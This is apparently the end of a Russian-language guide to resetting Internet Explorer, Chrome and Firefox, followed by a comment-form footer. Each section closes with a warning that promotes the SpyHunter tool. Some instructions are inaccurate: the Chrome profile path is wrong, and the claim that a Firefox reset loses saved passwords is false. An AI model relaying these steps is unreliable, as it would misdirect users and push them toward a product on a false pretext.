Под Сброс параметров браузера Internet Explorer, кликните Сброс. И нажмите Сброс ещё раз в открывшемся окне.

Выберите галочку Удалить личные настройки для удаления истории, восстановления поиска и домашней страницы.

После того как Internet Explorer завершит сброс, кликните Закрыть в диалоговом окне.

Предупреждение: В случае если это не сработает используйте бесплатную опцию Сбросить настройки браузеров в Инструменты в программе Spyhunter Remediation Tool.

Для Google Chrome

Найдите папку установки Google Chrome по адресу: C:\Users\»имя пользователя»\AppData\Local\Google\Chrome\Application\User Data.

В папке User Data, найдите файл Default и переименуйте его в DefaultBackup.

Запустите Google Chrome и будет создан новый файл Default.

Настройки Google Chrome сброшены

Предупреждение: В случае если это не сработает используйте бесплатную опцию Сбросить настройки браузеров в Инструменты в программе Spyhunter Remediation Tool.

Для Mozilla Firefox

В меню выберите Помощь > Информация для решения проблем.

Кликните кнопку Сбросить Firefox.

После того, как Firefox завершит, он покажет окно и создаст папку на рабочем столе. Нажмите Завершить.

Предупреждение: Так вы потеряте выши пароли! Рекомендуем использовать бесплатную опцию Сбросить настройки браузеров в Инструменты в программе Spyhunter Remediation Tool.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *